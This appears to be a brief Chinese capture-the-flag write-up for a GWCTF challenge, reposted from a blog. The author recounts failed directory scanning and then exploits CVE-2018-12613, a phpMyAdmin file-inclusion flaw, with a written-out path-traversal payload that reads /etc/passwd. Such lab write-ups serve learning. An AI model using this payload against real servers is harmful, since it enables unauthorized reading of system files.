标签:phpmyadmin .. phpMyAdmin 数据库 datadict GWCTF BUUFTC MySQL
啥都没有,前后端抓包也找不到啥,估计是目录扫描,但是号称第一的dirmap-master也没扫出啥
后来看博客,大佬们说看题目名字就猜到考啥,访问phpmyadmin路径(记下
phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具
存在漏洞cve-2018-12613-PhpMyadmin后台文件包含
payload:target=db_datadict.php%253f/../../../../../../../../etc/passwd
看flag
标签:phpmyadmin,..,phpMyAdmin,数据库,datadict,GWCTF,BUUFTC,MySQL 来源: https://www.cnblogs.com/aninock/p/15621012.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。